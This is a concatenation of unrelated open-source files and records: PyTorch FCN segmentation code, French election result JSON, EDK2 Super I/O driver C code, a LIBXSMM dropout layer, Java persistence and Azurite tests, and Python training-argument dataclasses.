        self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/8

        # conv4
        self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
        self.relu4_1 = nn.ReLU(inplace=True)
        self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_2 = nn.ReLU(inplace=True)
        self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_3 = nn.ReLU(inplace=True)
        self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/16

        # conv5
        self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_1 = nn.ReLU(inplace=True)
        self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_2 = nn.ReLU(inplace=True)
        self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_3 = nn.ReLU(inplace=True)
        self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/32

        # fc6 (fully-convolutional fc layer, 7x7)
        self.fc6 = nn.Conv2d(512, 4096, 7)
        self.relu6 = nn.ReLU(inplace=True)
        self.drop6 = nn.Dropout2d()

        # fc7 (1x1)
        self.fc7 = nn.Conv2d(4096, 4096, 1)
        self.relu7 = nn.ReLU(inplace=True)
        self.drop7 = nn.Dropout2d()

        # Per-class score map plus a single 32x bilinear-style upscore layer.
        self.score_fr = nn.Conv2d(4096, n_class, 1)
        self.upscore = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
                                          bias=False)

    def _initialize_weights(self):
        # Convs are zeroed (pretrained weights are loaded afterwards); the
        # upscore layer gets a fixed bilinear kernel from
        # get_upsampling_weight (module-level helper defined elsewhere in
        # this file — TODO confirm).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                m.weight.data.zero_()
                if m.bias is not None:
                    m.bias.data.zero_()
            if isinstance(m, nn.ConvTranspose2d):
                assert m.kernel_size[0] == m.kernel_size[1]
                initial_weight = get_upsampling_weight(
                    m.in_channels, m.out_channels, m.kernel_size[0])
                m.weight.data.copy_(initial_weight)

    def forward(self, x):
        h = x
        h = self.relu1_1(self.conv1_1(h))
        h = self.relu1_2(self.conv1_2(h))
        h = self.pool1(h)

        h = self.relu2_1(self.conv2_1(h))
        h = self.relu2_2(self.conv2_2(h))
        h = self.pool2(h)

        h = self.relu3_1(self.conv3_1(h))
        h = self.relu3_2(self.conv3_2(h))
        h = self.relu3_3(self.conv3_3(h))
        h = self.pool3(h)

        h = self.relu4_1(self.conv4_1(h))
        h = self.relu4_2(self.conv4_2(h))
        h = self.relu4_3(self.conv4_3(h))
        h = self.pool4(h)

        h = self.relu5_1(self.conv5_1(h))
        h = self.relu5_2(self.conv5_2(h))
        h = self.relu5_3(self.conv5_3(h))
        h = self.pool5(h)

        h = self.relu6(self.fc6(h))
        h = self.drop6(h)

        h = self.relu7(self.fc7(h))
        h = self.drop7(h)

        h = self.score_fr(h)
        h = self.upscore(h)
        # Crop the 19-pixel border introduced by the padding=100 stem so the
        # output matches the input's spatial size (standard FCN offset).
        h = h[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
        return h


def load_fcn(model_dir):
    # Loads the Caffe-converted FCN-32s checkpoint and moves it to GPU.
    fcn = FCN32s()
    fcn.load_state_dict(torch.load(os.path.join(model_dir, 'fcn32s_from_caffe.pth')))
    fcn.cuda()
    return fcn


class SemanticLoss(nn.Module):
    """MSE between instance-normalized FCN score maps of two images; inputs
    are preprocessed with vgg_preprocess (BGR, [0, 255])."""

    def __init__(self, opt):
        super(SemanticLoss, self).__init__()
        self.opt = opt
        self.instancenorm = nn.InstanceNorm2d(21, affine=False)

    def compute_fcn_loss(self, fcn, img, target):
        img_fcn = vgg_preprocess(img, self.opt)
        target_fcn = vgg_preprocess(target, self.opt)
        img_fea = fcn(img_fcn)
        target_fea = fcn(target_fcn)
        return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2)
25,805
348
{"nom":"Nègrepelisse","circ":"1ère circonscription","dpt":"Tarn-et-Garonne","inscrits":3912,"abs":1935,"votants":1977,"blancs":45,"nuls":15,"exp":1917,"res":[{"nuance":"REM","nom":"<NAME>","voix":558},{"nuance":"FN","nom":"<NAME>","voix":444},{"nuance":"SOC","nom":"Mme <NAME>","voix":346},{"nuance":"LR","nom":"M. <NAME>","voix":224},{"nuance":"FI","nom":"Mme <NAME>","voix":214},{"nuance":"ECO","nom":"<NAME>","voix":46},{"nuance":"DLF","nom":"Mme <NAME>","voix":22},{"nuance":"COM","nom":"M. <NAME>","voix":20},{"nuance":"EXG","nom":"<NAME>","voix":18},{"nuance":"ECO","nom":"Mme <NAME>","voix":14},{"nuance":"DIV","nom":"Mme <NAME>","voix":11}]}
262
373
<gh_stars>100-1000
/** @file
  Super I/O Interface implementation.

  Copyright (c) 2010 - 2019 Intel Corporation. All rights reserved. <BR>
  SPDX-License-Identifier: BSD-2-Clause-Patent
**/

#include "SioDriver.h"

/**
  Provides an interface to get a list of the current resources consumed by the device in the ACPI
  Resource Descriptor format.

  GetResources() returns a list of resources currently consumed by the device. The
  ResourceList is a pointer to the buffer containing resource descriptors for the
  device. The descriptors are in the format of Small or Large ACPI resource
  descriptor as defined by ACPI specification (2.0 & 3.0). The buffer of
  resource descriptors is terminated with the 'End tag' resource descriptor.

  @param[in]  This          Indicates a pointer to the calling context.
  @param[out] ResourceList  A pointer to an ACPI resource descriptor list that defines the current resources
                            used by the device. Type ACPI_RESOURCE_HEADER_PTR is defined in the "Related
                            Definitions" below.

  @retval EFI_SUCCESS            The operation completed successfully
  @retval EFI_INVALID_PARAMETER  ResourceList is NULL
**/
EFI_STATUS
EFIAPI
SioGetResources (
  IN  CONST EFI_SIO_PROTOCOL    *This,
  OUT ACPI_RESOURCE_HEADER_PTR  *ResourceList
  )
{
  SIO_DEV  *SioDev;

  if (ResourceList == NULL) {
    return EFI_INVALID_PARAMETER;
  }

  //
  // Recover the private device instance from the protocol pointer and
  // delegate to the device-level helper.
  //
  SioDev = SIO_DEV_FROM_THIS (This);
  return DeviceGetResources (&SioDev->Device, ResourceList);
}

/**
  Provides a collection of resource descriptor lists. Each resource descriptor list in the
  collection defines a combination of resources that can potentially be used by the device.

  @param[in]  This                Indicates a pointer to the calling context.
  @param[out] ResourceCollection  Collection of the resource descriptor lists.

  @retval EFI_SUCCESS            The operation completed successfully
  @retval EFI_INVALID_PARAMETER  ResourceCollection is NULL
**/
EFI_STATUS
EFIAPI
SioPossibleResources (
  IN  CONST EFI_SIO_PROTOCOL    *This,
  OUT ACPI_RESOURCE_HEADER_PTR  *ResourceCollection
  )
{
  SIO_DEV  *SioDev;

  if (ResourceCollection == NULL) {
    return EFI_INVALID_PARAMETER;
  }

  //
  // Delegate to the device-level helper for this SIO device.
  //
  SioDev = SIO_DEV_FROM_THIS (This);
  return DevicePossibleResources (&SioDev->Device, ResourceCollection);
}

/**
  Sets the resources for the device.

  @param[in] This          Indicates a pointer to the calling context.
  @param[in] ResourceList  Pointer to the ACPI resource descriptor list. Type ACPI_RESOURCE_HEADER_PTR
                           is defined in the "Related Definitions" section of
                           EFI_SIO_PROTOCOL.GetResources().

  @retval EFI_SUCCESS            The operation completed successfully
  @retval EFI_INVALID_PARAMETER  ResourceList is invalid
  @retval EFI_ACCESS_DENIED      Some of the resources in ResourceList are in use
**/
EFI_STATUS
EFIAPI
SioSetResources (
  IN CONST EFI_SIO_PROTOCOL   *This,
  IN ACPI_RESOURCE_HEADER_PTR ResourceList
  )
{
  SIO_DEV                   *SioDev;
  ACPI_RESOURCE_HEADER_PTR  ResourcePtr;
  ACPI_RESOURCE_HEADER_PTR  ResourceCollection;
  ACPI_RESOURCE_HEADER_PTR  ResourcePtr2;
  BOOLEAN                   Found;

  ResourcePtr = ResourceList;
  SioDev      = SIO_DEV_FROM_THIS (This);

  //
  // Check whether the resource is in the possible resource collection
  //
  // Outer loop: walk every descriptor in the caller-supplied ResourceList.
  // Inner loop: for each one, scan the device's possible-resource collection
  // for a byte-for-byte identical descriptor (CompareMem over header + payload).
  // Both lists are terminated by an ACPI 'End tag' descriptor.
  //
  DevicePossibleResources (&SioDev->Device, &ResourceCollection);
  while (ResourcePtr.SmallHeader->Byte != ACPI_END_TAG_DESCRIPTOR) {
    Found        = FALSE;
    ResourcePtr2 = ResourceCollection;

    while (ResourcePtr2.SmallHeader->Byte != ACPI_END_TAG_DESCRIPTOR) {
      if (ResourcePtr2.SmallHeader->Bits.Type == 0) {
        //
        // Small Header
        //
        if (CompareMem (
              ResourcePtr2.SmallHeader,
              ResourcePtr.SmallHeader,
              ResourcePtr2.SmallHeader->Bits.Length + sizeof (*ResourcePtr2.SmallHeader)
              ) == 0) {
          Found = TRUE;
          break;
        }

        //
        // Advance by the descriptor payload length plus the small header itself.
        //
        ResourcePtr2.SmallHeader = (ACPI_SMALL_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr2.SmallHeader
                                   + ResourcePtr2.SmallHeader->Bits.Length
                                   + sizeof (*ResourcePtr2.SmallHeader));
      } else {
        //
        // Large Header
        //
        if (CompareMem (
              ResourcePtr2.LargeHeader,
              ResourcePtr.LargeHeader,
              ResourcePtr2.LargeHeader->Length + sizeof (*ResourcePtr2.LargeHeader)
              ) == 0) {
          Found = TRUE;
          break;
        }

        ResourcePtr2.LargeHeader = (ACPI_LARGE_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr2.LargeHeader
                                   + ResourcePtr2.LargeHeader->Length
                                   + sizeof (*ResourcePtr2.LargeHeader));
      }
    }

    //
    // Any requested descriptor not present in the possible-resource collection
    // makes the whole request invalid.
    //
    if (!Found) {
      return EFI_ACCESS_DENIED;
    }

    //
    // Advance the outer cursor past the descriptor that was just matched.
    //
    if (ResourcePtr.SmallHeader->Bits.Type == 0) {
      ResourcePtr.SmallHeader = (ACPI_SMALL_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr.SmallHeader
                                + ResourcePtr.SmallHeader->Bits.Length
                                + sizeof (*ResourcePtr.SmallHeader));
    } else {
      ResourcePtr.LargeHeader = (ACPI_LARGE_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr.LargeHeader
                                + ResourcePtr.LargeHeader->Length
                                + sizeof (*ResourcePtr.LargeHeader));
    }
  }

  //
  // ResourceList can be set
  //
  return DeviceSetResources (&SioDev->Device, ResourceList);
}

/**
  Provides a low level access to the registers for the Super I/O.

  @param[in]      This         Indicates a pointer to the calling context.
  @param[in]      Write        Specifies the type of the register operation. If this parameter is TRUE,
                               Value is interpreted as an input parameter and the operation is a register write.
                               If this parameter is FALSE, Value is interpreted as an output parameter and the
                               operation is a register read.
  @param[in]      ExitCfgMode  Exit Configuration Mode Indicator. If this parameter is set to TRUE, the
                               Super I/O driver will turn off configuration mode of the Super I/O prior to returning
                               from this function. If this parameter is set to FALSE, the Super I/O driver will
                               leave Super I/O in the configuration mode. The Super I/O driver must track the
                               current state of the Super I/O and enable the configuration mode of Super I/O if
                               necessary prior to register access.
  @param[in]      Register     Register number.
  @param[in, out] Value        If Write is TRUE, Value is a pointer to the buffer containing the byte of data to be
                               written to the Super I/O register. If Write is FALSE, Value is a pointer to the
                               destination buffer for the byte of data to be read from the Super I/O register.

  @retval EFI_SUCCESS            The operation completed successfully
  @retval EFI_INVALID_PARAMETER  The Value is NULL
  @retval EFI_INVALID_PARAMETER  Invalid Register number
**/
EFI_STATUS
EFIAPI
SioRegisterAccess (
  IN CONST EFI_SIO_PROTOCOL  *This,
  IN BOOLEAN                 Write,
  IN BOOLEAN                 ExitCfgMode,
  IN UINT8                   Register,
  IN OUT UINT8               *Value
  )
{
  //
  // NOTE(review): this implementation only validates Value; no hardware
  // register access and no Register-range check is visible here. Confirm
  // whether this stub behavior is intentional for this platform.
  //
  if (Value == NULL) {
    return EFI_INVALID_PARAMETER;
  }

  return EFI_SUCCESS;
}

/**
  Provides an interface for a table based programming of the Super I/O registers.

  The Modify() function provides an interface for table based programming of the Super I/O
  registers. This function can be used to perform programming of multiple Super I/O registers with a
  single function call. For each table entry, the Register is read, its content is bitwise ANDed with
  AndMask, and then ORed with OrMask before being written back to the Register. The Super
  I/O driver must track the current state of the Super I/O and enable the configuration mode of Super I/
  O if necessary prior to table processing. Once the table is processed, the Super I/O device has to be
  returned to the original state.

  @param[in] This              Indicates a pointer to the calling context.
  @param[in] Command           A pointer to an array of NumberOfCommands EFI_SIO_REGISTER_MODIFY
                               structures. Each structure specifies a single Super I/O register modify operation.
                               Type EFI_SIO_REGISTER_MODIFY is defined in the "Related Definitions" below.
  @param[in] NumberOfCommands  Number of elements in the Command array.

  @retval EFI_SUCCESS            The operation completed successfully
  @retval EFI_INVALID_PARAMETER  Command is NULL
**/
EFI_STATUS
EFIAPI
SioModify (
  IN CONST EFI_SIO_PROTOCOL         *This,
  IN CONST EFI_SIO_REGISTER_MODIFY  *Command,
  IN UINTN                          NumberOfCommands
  )
{
  //
  // NOTE(review): the command table is not iterated here; only the Command
  // pointer is validated. Confirm whether this stub behavior is intentional.
  //
  if (Command == NULL) {
    return EFI_INVALID_PARAMETER;
  }

  return EFI_SUCCESS;
}
4,367
651
/****************************************************************************** * Copyright (c) Intel Corporation - All rights reserved. * * This file is part of the LIBXSMM library. * * * * For information on the license, see the LICENSE file. * * Further information: https://github.com/hfp/libxsmm/ * * SPDX-License-Identifier: BSD-3-Clause * ******************************************************************************/ /* <NAME>, <NAME> (Intel Corp.) ******************************************************************************/ #include <string> #include "Dropout.hpp" #include "fillers.hpp" #define PRIME_SEED 131 using namespace std; using namespace gxm; DropoutNode::DropoutNode(DropoutParams* p, MLEngine* e): NNNode(p, e) { nname_ = p->get_node_name(); ntype_ = p->get_node_type(); mode_ = p->get_mode(); bottom_ = p->get_bottom_names(); top_ = p->get_top_names(); bp_flag_ = p->get_bprop_flag(); has_weights_ = false; assert((bottom_.size() == 1) && (top_.size() == 1)); tenTop_ = new Tensor(top_[0]); assert(tenTop_ != NULL); tenTop_->setOwner(this); tenTop_->setType(ACT); tenTopData_ = tenTop_->getBuf(DATA); tenTopData_->setBufferType(DATA); #ifdef DEBUG printf("bottom name %s\n",bottom_[0].c_str()); #endif tenBot_ = e->get_tensor(bottom_[0], ACT); assert(tenBot_ != NULL); setPrevNode((NNNode*)tenBot_->getOwner()); tenBotData_ = tenBot_->getBuf(DATA); //Output tensor data type = input tensor data type int dtype = p->get_data_type(); tenTopData_->setDataType(dtype); // Get input tensor shape (bottom) Shape* bs = tenBot_->getShape(); assert(bs->ndims <= MAX_DIMS); Shape ts; shape_setzero(&ts); ts.ndims = bs->ndims; for(int i=0; i < bs->ndims; i++) ts.dims[i] = bs->dims[i]; tenTop_->setShape(&ts); long long int tsize = 1; for(int i=0; i<ts.ndims; i++) tsize = tsize*ts.dims[i]; // Mask to select neuron activations to be dropped out tenMask_ = new int[tsize]; if(dtype == DT_FLOAT) tsize = tsize*sizeof(float); else if(dtype == DT_INT16) tsize = tsize*sizeof(short int); 
// Set the logical size of the tensor buffer for bufId=0 (forward data buffer). // Note: we have no knowledge of the machine parameters here, so effectively this is single-machine config tenTopData_->setBufferSize(tsize); if(!e->is_inference_only()) { if(bp_flag_) { tenBotDiff_ = tenBot_->addBuf(); // DIFF type and index tenBotDiff_->setDataType(dtype); tenBotDiff_->setBufferType(DIFF); long long int bsize = 1; for(int i=0; i<bs->ndims; i++) bsize = bsize*bs->dims[i]; if(dtype == DT_FLOAT) bsize = bsize*sizeof(float); else if(dtype == DT_INT) bsize = bsize*sizeof(int); // Set the size of the input-gradient buffer tenBotDiff_->setBufferSize(bsize); } } else tenBotDiff_ = NULL; // Compute scale via dropout_ratio threshold_ = p->get_dropout_ratio(); if(threshold_ != 0.5) { printf("Support for threshold %f not implemented! Resetting to 0.5\n",threshold_); threshold_ = 0.5; } scale_ = 1./(1 - threshold_); // Register output tensor in tensor map bool inserted = e->register_tensor(top_[0], ACT, tenTop_); if(!inserted) printf("Warning: Tensor %s already registered\n",NNNode::top_[0].c_str()); gparams_.batch_size = bs->dims[0]; gparams_.nInput = bs->dims[1]; gparams_.nOutput = gparams_.nInput; gparams_.iHeight = bs->dims[2]; gparams_.iWidth = bs->dims[3]; gparams_.oHeight = ts.dims[2]; gparams_.oWidth = ts.dims[3]; gparams_.data_type = dtype; gparams_.num_threads = e->get_num_threads(); seeds = new unsigned int[gparams_.num_threads]; for(int i=0; i<gparams_.num_threads; i++) seeds[i] = PRIME_SEED + i; eptr_ = e; }; void DropoutNode::forwardPropagate() { #ifdef RETURNALL return; #endif float* bot = (float*)(tenBotData_->getBuffer()); float* top = (float*)(tenTopData_->getBuffer()); int *mask = (int *)tenMask_; // unsigned int *seeds = tenSeeds_; #ifdef DEBUG printf("Executing FP %s: input %p, output %p\n",NNNode::nname_.c_str(), bot, top); printf("Inputs: %d\n",gparams_.nInput); printf("Outputs: %d\n",gparams_.nOutput); #endif int M = gparams_.batch_size; int N = 
gparams_.nOutput; int H = gparams_.oHeight; int W = gparams_.oWidth; if(eptr_->get_execution_mode() == TRAIN) { #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) { int r = rand_r(&seeds[omp_get_thread_num()]); if(r%2 == 0) top[i] = 0; else top[i] = bot[i] * scale_; } } else { #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) top[i] = bot[i]; } #ifdef DEBUG MeanOfLayer((char*)bottom_[0].c_str(), bot, M*N*H*W); MeanOfLayer((char*)top_[0].c_str(), top, M*N*H*W); #endif } void DropoutNode::backPropagate() { #ifdef REUTRNALL return; #endif int M = gparams_.batch_size; int N = gparams_.nOutput; int H = gparams_.oHeight; int W = gparams_.oWidth; TensorBuf *tenTopDiff = tenTop_->getBuf(DIFF); float *gtop = (float*)(tenTopDiff->getBuffer()); assert(gtop != NULL); float* gbot = (float*)(tenBotDiff_->getBuffer()); int *mask = (int *)tenMask_; #ifdef DEBUG printf("Executing BP %s: grad_output %p, grad_input %p\n",NNNode::nname_.c_str(), gtop, gbot); printf("Grad Outputs: %d\n", N*H*W); printf("Grad Inputs: %d\n", N*H*W); #endif assert(eptr_->get_execution_mode() == TRAIN); #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) gbot[i] = gtop[i] * mask[i] * scale_; #ifdef DEBUG MeanOfLayer((char*)bottom_[0].c_str(), gtop, M*N*H*W); MeanOfLayer((char*)top_[0].c_str(), gbot, M*N*H*W); #endif }
2,584
852
<reponame>ckamtsikis/cmssw #include <iostream> #include <string> #include "GeneratorInterface/HiGenCommon/interface/BaseHiGenEvtSelector.h" class HiGenEvtSelectorFactory { public: HiGenEvtSelectorFactory() { ; } virtual ~HiGenEvtSelectorFactory() { ; } static BaseHiGenEvtSelector* get(std::string, const edm::ParameterSet&); };
122
348
{"nom":"Annezin","circ":"9ème circonscription","dpt":"Pas-de-Calais","inscrits":4542,"abs":2358,"votants":2184,"blancs":46,"nuls":16,"exp":2122,"res":[{"nuance":"FN","nom":"M. <NAME>","voix":539},{"nuance":"MDM","nom":"Mme <NAME>","voix":473},{"nuance":"FI","nom":"<NAME>","voix":322},{"nuance":"RDG","nom":"M. <NAME>","voix":321},{"nuance":"LR","nom":"<NAME>-<NAME>","voix":194},{"nuance":"DVG","nom":"<NAME>","voix":70},{"nuance":"ECO","nom":"Mme <NAME>","voix":67},{"nuance":"DLF","nom":"M. <NAME>","voix":45},{"nuance":"COM","nom":"M. <NAME>","voix":34},{"nuance":"EXG","nom":"Mme <NAME>","voix":19},{"nuance":"DIV","nom":"M. <NAME>","voix":16},{"nuance":"ECO","nom":"M. <NAME>","voix":12},{"nuance":"DIV","nom":"M. <NAME>","voix":10}]}
305
310
package com.playtika.test.azurite;

import com.azure.storage.blob.BlobContainerClient;
import com.azure.storage.blob.BlobServiceClient;
import com.azure.storage.blob.BlobServiceClientBuilder;
import org.junit.jupiter.api.DisplayName;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.boot.test.context.SpringBootTest;

import java.util.UUID;

import static org.assertj.core.api.Assertions.assertThat;

/**
 * Verifies that the embedded Azurite blob-storage emulator is bootstrapped
 * and reachable through the auto-configured {@link BlobServiceClientBuilder}.
 */
@SpringBootTest(classes = EmbeddedAzuriteBoostrapConfigurationTest.AzuriteTestConfiguration.class)
class EmbeddedAzuriteBoostrapConfigurationTest {

    @Autowired
    BlobServiceClientBuilder blobServiceClientBuilder;

    @Test
    void accountName() {
        // The emulator must report the account name declared in AzuriteProperties.
        BlobServiceClient client = blobServiceClientBuilder.buildClient();

        assertThat(client.getAccountName()).isEqualTo(AzuriteProperties.ACCOUNT_NAME);
    }

    @Test
    @DisplayName("do some basic operations to show that azurite is running and working correctly")
    void createAndDeleteContainer() {
        BlobServiceClient client = blobServiceClientBuilder.buildClient();

        // Snapshot the container count so the assertions are independent of
        // whatever state other tests may have left behind.
        long initialContainerCount = client.listBlobContainers().stream().count();

        // Creating a fresh, randomly named container must yield an empty
        // container and bump the count by exactly one.
        BlobContainerClient container = client.createBlobContainer(UUID.randomUUID().toString());
        assertThat(container.listBlobs().stream()).isEmpty();
        assertThat(client.listBlobContainers().stream().count()).isEqualTo(initialContainerCount + 1);

        // Deleting it must restore the original count.
        container.delete();
        assertThat(client.listBlobContainers().stream().count()).isEqualTo(initialContainerCount);
    }

    @EnableAutoConfiguration
    public static class AzuriteTestConfiguration {
    }
}
628
963
package com.vladmihalcea.book.hpjp.hibernate.identifier;

import org.hibernate.cfg.AvailableSettings;
import org.junit.Test;

import javax.persistence.*;
import java.util.Properties;

/**
 * Verifies that Hibernate's {@code pooled-lo} sequence optimizer is selected
 * via the {@code PREFERRED_POOLED_OPTIMIZER} setting rather than being named
 * explicitly on the generator mapping.
 */
public class PreferredPooledLoSequenceIdentifierTest extends AbstractPooledSequenceIdentifierTest {

    // Entities registered with the test's persistence unit.
    @Override
    protected Class<?>[] entities() {
        return new Class<?>[] {
            Post.class
        };
    }

    // Force the pooled-lo optimizer globally; the generator below only
    // declares an allocationSize and relies on this preference.
    @Override
    protected void additionalProperties(Properties properties) {
        properties.put(AvailableSettings.PREFERRED_POOLED_OPTIMIZER, "pooled-lo");
    }

    @Override
    protected Object newEntityInstance() {
        return new Post();
    }

    // Delegates to the base class, which persists entities and inspects the
    // sequence values produced by the configured optimizer.
    @Test
    public void testOptimizer() {
        insertSequences();
    }

    /**
     * Minimal entity whose identifier is produced by the {@code post_sequence}
     * database sequence with an allocation (pool) size of 3.
     */
    @Entity(name = "Post")
    public static class Post {

        @Id
        @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = "post_sequence")
        @SequenceGenerator(
            name = "post_sequence",
            sequenceName = "post_sequence",
            allocationSize = 3
        )
        private Long id;
    }
}
446
1,229
<gh_stars>1000+
from dataclasses import dataclass
from typing import Dict
from typing import List, Optional

from absl import logging
from smart_arg import LateInit
from smart_arg import arg_suite

from smart_compose.utils import parsing_utils


class Arg:
    """Helper class for cooperative multi-inheritance.

    Base of every argument dataclass below; its no-op ``__post_init__`` lets
    every subclass call ``super().__post_init__()`` safely regardless of MRO
    position.
    """

    def _set_late_init_attr(self, attr, value):
        """Sets an attribute as empty list if it's LateInit"""
        if getattr(self, attr) is LateInit:
            setattr(self, attr, value)

    def __post_init__(self):
        # Intentionally a no-op anchor for cooperative super() chains.
        pass


@dataclass
class NetworkArg(Arg):
    """Neural network related arguments"""
    num_units: int = 50  # Dimension of embedding. Also used as the hidden state size in RNN cell
    beam_width: int = 10  # Beam width of beam search decoding
    max_decode_length: int = 3  # Max length of decoding
    length_norm_power: float = 0.  # Power of length normalization. Larger value means more penalty on long sequences generated by beam search
    min_seq_prob: float = 0.  # Minimum probability of the emitted sequence. If set to zero, then no pruning will be performed


@dataclass
class FeatureArg(Arg):
    """Feature related arguments"""
    target_column_name: str = ''  # Column name of the text source field

    # Vocab and word embedding
    vocab_file: str = ''  # Vocab file
    vocab_hub_url: str = ''  # TF hub url to vocab layer
    we_file: str = ''  # Pretrained word embedding file
    embedding_hub_url: str = ''  # TF hub url to embedding layer
    we_trainable: bool = True  # Whether to train word embedding

    # Special tokens
    PAD: str = '[PAD]'  # Token for padding
    SEP: str = '[SEP]'  # Token for sentence separation
    CLS: str = '[CLS]'  # Token for start of sentence
    UNK: str = '[UNK]'  # Token for unknown word
    MASK: str = '[MASK]'  # Token for masked word

    max_len: int = 32  # Max sent length.
    min_len: int = 3  # Min sent length.

    # Late init variables inferred from post initialization. DO NOT pass any values to the following arguments
    feature_type_2_name: Dict[str, str] = LateInit  # Late init only. DO NOT pass value. Map of feature type to feature names

    def __post_init__(self):
        # Validates the vocab/embedding configuration and assembles
        # feature_type_2_name from the feature types declared by
        # parsing_utils.get_feature_types().
        super().__post_init__()
        assert self.target_column_name, "target_column_name should not be empty"
        if not self.embedding_hub_url:
            assert self.vocab_hub_url or self.vocab_file, "If embedding hub url is not specified, vocab hub url or vocab file must be given"

        # Assemble feature map
        self.feature_type_2_name = dict()
        all_ftr_names = list()
        for ftr_type in parsing_utils.get_feature_types():
            # Every declared feature type must exist as a field on this class.
            assert hasattr(self, ftr_type), f'{ftr_type} must be defined in Smart Compose argument parser'
            ftr_name = getattr(self, ftr_type)
            if ftr_name:
                self.feature_type_2_name[ftr_type] = ftr_name
                # Normalize to a list so scalar and list-valued feature names
                # are counted uniformly in the duplicate check.
                ftr_name = [ftr_name] if not isinstance(ftr_name, list) else ftr_name
                all_ftr_names += ftr_name
                # NOTE(review): indentation reconstructed from a collapsed
                # source line; the duplicate check is assumed to run only when
                # names were added — confirm against the original file.
                assert len(set(all_ftr_names)) == len(
                    all_ftr_names), f'Duplicate feature names for feature type {ftr_type}'


@dataclass
class DatasetArg(Arg):
    """Dataset related arguments"""
    num_gpu: int = -1  # Number of GPU for training

    distribution_strategy: str = ''  # Distributed training strategy. Reference: tf official models: official/common/distribute_utils.py#L102
    __distribution_strategy = {'choices': ['one_device', 'mirrored', 'parameter_server', 'multi_worker_mirrored', 'tpu']}
    all_reduce_alg: Optional[str] = None  # All reduce algorithm. Reference: tf official models: official/common/distribute_utils.py#L102
    __all_reduce_alg = {'choices': ["hierarchical_copy", "nccl", "ring"]}
    run_eagerly: bool = False  # Whether to run in eager mode. Use True for debugging and False for speed

    train_file: str = ''  # Train file.
    dev_file: str = ''  # Dev file.
    test_file: str = ''  # Test file.
    out_dir: str = ''  # Store log/model files.

    num_train_steps: int = 1  # Num steps to train.
    num_eval_steps: int = 0  # Num steps to eval.
    num_epochs: int = 0  # Num of epochs to train, will overwrite train_steps if set
    steps_per_stats: int = 100  # training steps to print statistics.
    num_eval_rounds: int = 0  # number of evaluation round, this param will override steps_per_eval as max(1, num_train_steps / num_eval_rounds)
    steps_per_eval: int = 1000  # training steps to evaluate datasets.
    resume_training: bool = False  # Whether to resume training from checkpoint in out_dir.
    keep_checkpoint_max: int = 5  # The maximum number of recent checkpoint files to keep. If 0, all checkpoint files are kept. Defaults to 5
    train_batch_size: int = 32  # Training data batch size.
    test_batch_size: int = 32  # Test data batch size.

    def __post_init__(self):
        # Validates required paths/strategy settings and derives the step
        # schedule (num_train_steps, steps_per_eval, steps_per_stats).
        super().__post_init__()
        # Check matches between distribution strategy and all reduce algorithm. Reference: tf official models: official/common/distribute_utils.py#L102
        if self.all_reduce_alg is not None:
            if self.distribution_strategy == 'mirrored':
                assert self.all_reduce_alg in [None, 'nccl', 'hierarchical_copy']
            elif self.distribution_strategy == 'multi_worker_mirrored':
                assert self.all_reduce_alg in [None, 'nccl', 'ring']
            else:
                raise NotImplementedError(
                    f'Unsupported all reduce algorithm {self.all_reduce_alg} for chosen distribution strategy {self.distribution_strategy}')

        assert self.train_file, 'training_file must be specified'
        assert self.dev_file, 'dev_file must be specified'
        assert self.test_file, 'test_file must be specified'
        assert self.out_dir, 'out_dir must be specified'
        assert self.num_gpu >= 0, 'num_gpu must be specified'
        assert self.distribution_strategy, 'distribution_strategy must be specified'
        assert self.keep_checkpoint_max >= 0, 'keep_checkpoint_max must >= 0'

        # If epoch is set, overwrite training steps
        if self.num_epochs:
            steps_per_epoch = parsing_utils.estimate_steps_per_epoch(self.train_file, self.train_batch_size)
            self.num_train_steps = steps_per_epoch * self.num_epochs

        # If num_eval_rounds is set, override steps_per_eval
        assert self.num_eval_rounds >= 0, 'num_eval_rounds must be non-negative integers'
        if self.num_eval_rounds:
            self.steps_per_eval = max(1, int(self.num_train_steps / self.num_eval_rounds))

        # Stats can never be reported less often than evaluation happens.
        if self.steps_per_stats > self.steps_per_eval:
            logging.error('steps_per_stats: %d is specified to be greater than steps_per_eval: %d, we will use steps_per_eval as'
                          ' steps_per_stats.', self.steps_per_stats, self.steps_per_eval)
            self.steps_per_stats = self.steps_per_eval


@dataclass
class OptimizationArg(Arg):
    """Optimization related arguments"""
    random_seed: int = 1234  # Random seed for experiment. Use the same random seed for experiment repeatability
    use_lr_schedule: bool = True  # Whether to use warmup and decay on learning rate
    num_warmup_steps: int = 0  # Num steps for warmup. TODO: change to warm up ratio in the future
    optimizer: str = 'sgd'  # Type of optimizer to use. adamw is the AdamWeightDecay optimizer
    use_bias_correction_for_adamw: bool = False  # Whether to use bias correction for AdamWeightDecay optimizer
    __optimizer = {'choices': ['sgd', 'adam', 'adamw', 'lamb']}
    max_gradient_norm: float = 1.0  # Clip gradients to this norm.
    learning_rate: float = 1.0  # Learning rate
    lr_bert: float = 0.001  # Learning rate for BERT
    l1: float = 0.  # Scale of L1 regularization
    l2: float = 0.  # Scale of L2 regularization

    pmetric: str = ''  # Primary metric
    __pmetric = {'choices': ['perplexity']}
